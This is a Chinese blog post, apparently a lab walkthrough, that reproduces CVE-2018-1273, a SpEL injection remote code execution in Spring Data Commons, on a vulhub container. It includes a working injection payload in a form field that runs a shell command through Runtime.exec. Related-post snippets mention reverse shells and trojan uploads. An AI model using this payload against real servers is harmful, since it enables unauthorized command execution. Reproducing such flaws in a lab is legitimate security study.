Spring Data Commons远程命令执行(CVE-2018-1273)

最新推荐文章于 2024-05-18 21:26:17 发布
最新推荐文章于 2024-05-18 21:26:17 发布
阅读量264 收藏
点赞数
分类专栏: spring 文章标签: 安全 Powered by 金山文档
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Lucky1youzi/article/details/128522147
版权

0x01 漏洞简介

当用户在项目中利用了Spring-data的相关web特性对用户的输入参数进行自动匹配的时候,会将用户提交的form表单的key值作为Spel的执行内容而产生漏洞

0x02 影响版本

Spring Data Commons 1.13 - 1.13.10 (Ingalls SR10) Spring Data REST 2.6 - 2.6.10 (Ingalls SR10) Spring Data Commons 2.0 to 2.0.5 (Kay SR5) Spring Data REST 3.0 - 3.0.5 (Kay SR5)

0x03 漏洞复现

这里用的是vulhub靶场,部署好靶场环境,用火狐访问靶场:http://your ip:端口/users 在注册页面提交任意信息

bp抓包,发送到repeater进行修改数据包,构造payload,创建文件,进行发包测试

username[#this.getClass().forName("java.lang.Runtime").getRuntime().exec("touch /tmp/2333")]=&password=&repeatedPassword=

进入容器查看文件夹是否创建成功(文件创建成功~):进入centos环境中,执行docker-compose exec spring bash,进入目录(cd tmp),查看tmp下的目录成功出现2333文件,命令执行成功。

执行Ctrl+D 退出当前用户的命令环境

关闭docker环境,docker-compose down

Lucky1youzi
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
vulhub-Spring Data Commons 远程命令执行CVE-2018-1273)复现
weixin_63580357的博客
11-02 127
Spring Data 是一个简化数据库访问,并支持云服务的开源框架,Spring Data CommonsSpring Data 下所有子项目共享的基础框架。Spring Data Commons 在2.0.5及以前版本中,存在一处SpEL表达式注入漏洞。
spring 代码执行CVE-2018-1273
YouthBelief的博客
11-11 1725
spring 代码执行 CVE-2018-1273spring 代码执行CVE-2018-1273)0x01 漏洞描述0x02 影响范围0x03 漏洞复现wget反弹shell0x04 漏洞修复 spring 代码执行CVE-2018-1273) 0x01 漏洞描述 Spring Expression Language是一个功能强大的表达式 语言支持查询和在运行时操作一个对象图。 攻击者可以在未获得授权的情况下,将精心制作的请求参数注入到存在该漏洞的服务器上,从而发起远程代码执行攻击。 0x02 影
spring:CVE-2018:1273
最新发布
weixin_69670995的博客
05-18 410
使用浏览器访问users,并输入随便东西。在kali上使用vim新建测试txt文件。使用dirsearch工具进行目录扫描。使用python3开启临时http。修改payload,让靶机执行木马。修改payload,提升木马权限。发到重发器,并修改post传参。返回200,上传txt文件成功。修改paylaod,上传木马。执行成功,返回靶机shell。使用burp抓包,点击注册。返回200,上传成功。
spring(CVE-2018-1273)远程代码执行漏洞复现
热门推荐
勤劳的码农的博客
03-12 1万+
Spring DataSpring框架中提供底层数据访问的项目模块,Spring Data Commons 是一个共用的基础模块。此模块对特殊属性处理时会使用SpEl表达式,导致攻击者可以通过构造特殊的URL请求,造成服务端远程代码执行。在2.0.5及以前版本中,存在一处SpEL表达式注入漏洞,攻击者可以注入恶意SpEL表达式以执行任意命令Spring在补丁中使用更加安全的SimpleEvaluationContext替换了StandardEvaluationContext。
Spring Data Commons 远程命令执行漏洞
m0_63241485的博客
08-17 480
Spring是一个开源框架,它是为了解决企业应用开发的复杂性而创建的。Spring使用基本的JavaBean来完成以前只可能由EJB完成的事情。然而,Spring的用途不仅限于服务器端的开发。从简单性、可测试性和松耦合的角度而言,任何Java应用都可以从Spring中受益。Spring的开发初衷:1、JAVA EE开发应该更加简单。2、使用接口而不是使用类,是更好的编程习惯。Spring将使用接口的复杂度几乎降低到了零。3、为JavaBean提供了一个更好的应用配置框架。...
Spring Data Commons远程命令执行漏洞_CVE-2018-1273(反序列Runtime方法)
weixin_42786460的博客
09-16 373
Spring Data Commons远程命令执行漏洞_CVE-2018-1273(反序列Runtime方法)
001--什么是SpringData
weixin_42288943的博客
04-17 167
1.参考网址:https://blog.csdn.net/zgf19930504/article/details/50537198 2.核心内容: ** Spring Data **是Spring 的一个子项目, 旨在统一和简化对各类型持久化存储, 而不拘泥于是关系型数据库还是NoSQL 数据存储。无论是哪种持久化存储, 数据访问对象(或称作为DAO,...
poc-cve-2018-1273:CVE-2018-1273的POC
05-15
CVE-2018-1273 Spring Data Commons(1.13至1.13.10之前的版本,2.0至2.0.5的版本以及较早的不受支持的版本)包含由于特殊元素的不正确中和导致的属性绑定器漏洞。 未经身份验证的远程恶意用户(或攻击者)可以针对...
spring-data-commons-2.0.6.RELEASE-API文档-中文版.zip
07-14
赠送jar包:spring-data-commons-2.0.6.RELEASE.jar; 赠送原API文档:spring-data-commons-2.0.6.RELEASE-javadoc.jar; 赠送源代码spring-data-commons-2.0.6.RELEASE-sources.jar; 赠送Maven依赖信息文件:...
spring-data-commons-2.5.5-API文档-中文版.zip
06-04
赠送jar包:spring-data-commons-2.5.5.jar; 赠送原API文档:spring-data-commons-2.5.5-javadoc.jar; 赠送源代码spring-data-commons-2.5.5-sources.jar; 赠送Maven依赖信息文件:spring-data-commons-2.5.5....
spring-data-commons-2.0.9.RELEASE-API文档-中英对照版.zip
06-12
赠送jar包:spring-data-commons-2.0.9.RELEASE.jar; 赠送原API文档:spring-data-commons-2.0.9.RELEASE-javadoc.jar; 赠送源代码spring-data-commons-2.0.9.RELEASE-sources.jar; 赠送Maven依赖信息文件:...
spring-data-commons-2.3.9.RELEASE-API文档-中文版.zip
07-13
赠送jar包:spring-data-commons-2.3.9.RELEASE.jar; 赠送原API文档:spring-data-commons-2.3.9.RELEASE-javadoc.jar; 赠送源代码spring-data-commons-2.3.9.RELEASE-sources.jar; 赠送Maven依赖信息文件:...
spring 代码执行CVE-2018-1273)复现
weixin_63124284的博客
10-29 1034
Spring Expression Language是一个功能强大的表达式 语言支持查询和在运行时操作一个对象图。 攻击者可以在未获得授权的情况下,将精心制作的请求参数注入到存在该漏洞的服务器上,从而发起远程代码执行攻击。 ​
Spring Data Commons 远程命令执行漏洞(CVE-2018-1273
黑白的博客
12-20 2564
声明 好好学习,天天向上 漏洞描述 Spring Data是一个用于简化数据库访问,并支持云服务的开源框架,Spring Data CommonsSpring Data下所有子项目共享的基础框架。Spring Data Commons 在2.0.5及以前版本中,存在一处SpEL表达式注入漏洞,攻击者可以注入恶意SpEL表达式以执行任意命令。 影响范围 · Spring Data Commons 1.13 - 1.13.10 (Ingalls SR10) · Spring Data REST 2.6 - 2
[Java安全]Spring Data CommonsCVE-2018-1273
snowlyzz的博客
02-08 663
CVE-2018-1273看漏洞分析
Spring 框架相关漏洞详解合集
zjjcchina的博客
01-19 4228
虽说是 Spring 框架漏洞,但以下包含并不仅 Spring Framework,Spring Boot,还有 Spring Cloud,Spring DataSpring Security 等。 CVE-2010-1622 Spring Framework class.classLoader 类远程代码执行 影响版本:SpringSource Spring Framework 3.0.0 - 3.0.2、SpringSource Spring Framework 2.5.0 - 2.5.7
漏洞复现 | CVE-2018-1273 Spring Data Commons 远程命令执行
weixin_42282189的博客
09-15 1783
作者: 墨阳 免责声明:本文仅供学习研究,严禁从事非法活动,任何后果由使用者本人负责。 0x00 前言 Spring Data是一个用于简化数据库访问,并支持云服务的开源框架,Spring Data CommonsSpring Data下所有子项目共享的基础框架。Spring Data Commons 在2.0.5及以前版本中,存在一处SpEL表达式注入漏洞,攻击者可以注入恶意SpEL表达式以执行任意命令。 受影响版本: Spring Data Commons 1.13 – 1.13.10 (Inga.
Java getClass() , getName() , Class.forName() 详解
Freeway的博客
10-04 4038
Class.forName方法: A a = (A)Class.forName("pacage.A").newInstance(); // 等价于 A a = new A(); Class.forName(); //返回的是一个类 Class.forName(); //的作用是要求JVM查找并加载指定的类,也就是说JVM会执行该类的静态代码段 String str
Java代码审计基础—反射(渗透测试)
Thunderclap的博客
08-26 1314
Java代码审计基础——反射
Spring Data Commons 2.0.0.M2: 提升项目元数据与Repository管理
Spring Data Commons 2.0.x_2.0.0.M2 是一个官方文档,主要针对 Spring Data Commons 的版本 2.0.0.M2 发布,由 Oliver Gierke、Thomas Darimont、Christoph Strobl、Mark Pollack 和 Thomas Risberg 等作者共同编撰...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值